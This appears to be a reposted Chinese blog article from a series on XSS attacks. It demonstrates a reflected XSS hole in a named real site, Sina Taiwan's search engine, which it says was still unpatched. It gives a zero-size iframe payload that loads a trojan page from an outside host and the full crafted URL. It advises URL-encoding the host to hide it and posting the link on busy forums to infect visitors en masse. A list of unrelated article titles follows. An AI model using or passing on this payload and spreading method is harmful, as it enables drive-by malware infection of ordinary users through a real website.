专题研究第三期:XSS攻击——跨站(第二篇)
来源:互联网 发布:《网络创世纪》 编辑:程序博客网 时间:2024/05/20 12:50
我在引言篇讲述了跨站漏洞的一些利用方式。没有实例,可能比较抽象。这里我举个案例来说明问题:
ps:所举案例是 sina 台湾站搜索引擎,漏洞在文章发布之前仍然存在,这里只做示范。任何因此文带来的破坏行为皆非我所愿,请勿破坏。
打开
http://search.sina.com.tw
我们在搜索关键词里输入:
<script>alert("test")</script>
对其下各个搜索频道进行测试。
经过测试,我们发现 新闻、图片、分类等搜索存在xss跨站问题。
连这样的大站都存在问题,更不用说普通的网站了。大家可以测试其他站点的搜索引擎。
问题在于利用
结合url欺骗,我们可以很“温柔”地利用跨站。
a 大面积挂马
配置网马,在搜索关键词里填入:
<iframe src"http://www.mama.com/ma.htm" name="hu" width="0" height="0"></iframe>
然后你会发现打开了我们的网马页面。此时复制地址栏地址:
http://google.sina.com.tw/cgi-bin/google_images.cgi?word=%3Ciframe+src%22http%3A%2F%2Fwww.mama.com%2Fma.htm%22+name%3D%22hu%22+width%3D%220%22+height%3D%220%22%3E%3C%2Fiframe%3E&submit=%B7j+%B4M&big5=1
这个就是咱们的马的页面了。
为了隐蔽,我们可以对 www.mama.com 进行url编码。
然后去个人流量大的bbs发个什么帖子。利用我前面说的url欺骗方式进行挂马。不怕肉鸡DDOS你,尽管试试吧。
b 针对指定目标
这里涉及到对目标站点源代码的熟悉情况。将在以后的几篇中介绍。
- 专题研究第三期:XSS攻击——跨站(第二篇)
- 专题研究第三期:XSS攻击——跨站(引言篇)
- web安全————XSS(攻击篇)
- web渗透—xss攻击
- web渗透—xss攻击防御
- XSS攻击(二)
- 跨站脚本攻击(XSS)——常见网站攻击手段原理与防御
- 新技能get——springMVC处理XSS攻击
- 网络攻击技术(二)——Cross-site scripting (xss)
- Web安全——XSS脚本注入攻击
- Web前端安全——XSS攻击与防御
- 小迪教程第十二天——XSS攻击
- js 前端防xss攻击——百度UEditor解决方案
- ESAPI——预防XSS攻击工具使用简介
- 两种跨站攻击方式——XSS和CSRF
- XSS攻击
- XSS攻击
- XSS攻击
- 通过注册表更改系统盘盘符
- unity3d用鼠标拖动物体的一段代码
- Unity3d 鼠标拾取
- Android code cut 1 --圆形在屏幕撞墙弹回
- 专题研究第三期:XSS攻击——跨站(引言篇)
- 专题研究第三期:XSS攻击——跨站(第二篇)
- 程序2.1:非递归方法实现迷宫
- Vmware虚拟机下红旗Linux 6.0桌面版安装尝试
- KMplayer附加音轨设置及影音同步问题
- For baby
- 三分法求近是值 hdu 3714
- 263企业邮箱 Nokia 5235收发邮件设置
- 阅读优秀代码是提高开发人员修为的一种捷径
- MonoDroid学习笔记(五)—— 更改TextView字体颜色和背景色及Style样式的定义